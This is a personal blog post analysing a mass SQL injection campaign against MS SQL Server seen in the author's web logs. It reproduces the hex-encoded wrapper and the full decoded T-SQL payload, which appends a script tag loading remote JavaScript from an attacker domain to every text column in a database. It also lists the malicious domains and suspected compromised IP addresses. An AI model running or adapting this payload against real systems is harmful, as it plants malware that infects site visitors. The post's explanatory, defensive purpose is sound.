Andre's Blog
Perfection is when there is nothing left to take away
Massive SQL injection, anyone?

Last weekend I found a number of entries in the HTTP server logs indicating SQL injection attempts. The SQL targeted MS SQL Server and used the CAST function to decode a long hexadecimal sequence used to bypass code quote-escaping code on the server side.

DECLARE @S VARCHAR(4000);
SET @S=CAST(0x4445434C4152452040542...736F7220 AS VARCHAR(4000));
EXEC(@S);

If such sequence is appended to a non-validated numeric SQL parameter, it would be expanded into a block of SQL text shown below and executed by the server. This code scans the system catalog, selects all columns containing text (text, varchar and nvarchar) and appends a script tag to each one of them.

DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR 
   SELECT a.name,b.name 
   FROM sysobjects a,syscolumns b 
   WHERE a.id=b.id AND a.xtype='u' AND 
      (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
   BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=
      RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+
         ''<script src=http://www.adsitelo.com/b.js></script>''') 
   FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

If any of the modified text was indeed HTML, it would be rendered by website visitors, forcing them to execute JavaScript from the script file (b.js) containing malicious code.

Domain names alternated in the HTTP requests between the one shown in the SQL, www.advabnr.com and www.bigadnet.com. All domains are registered in Beijing, China. Domain name servers, however, belonged to Clearwire and Charter Communications.

When I looked up IP address DNS records for one of the domains, it came back with a whopping list of a dozen addresses, as if this were a major corporation:

65.26.203.88, 59.126.54.130, 202.55.166.34, 67.176.123.71, 76.185.248.10, 85.65.224.194, 65.35.89.174, 81.130.198.232, 208.107.51.92, 81.247.187.98, 75.70.182.21, 68.161.245.150, 211.3.231.32, 71.199.208.21, 82.120.66.58

Checking registration information for some of these addresses, it appears that all addresses belong to various ISPs, such as Road Runner, Comcast, China Telecom, etc, which would mean that all of these machines were hacked end-user computers hosting a web server (nginx/0.5.33) for the sole purpose of serving the JavaScript code used in the SQL code above.

Useful Links

http://en.wikipedia.org/wiki/SQL_injection

http://msdn.microsoft.com/en-us/library/ms161953.aspx

Comments:
Name:

Comment: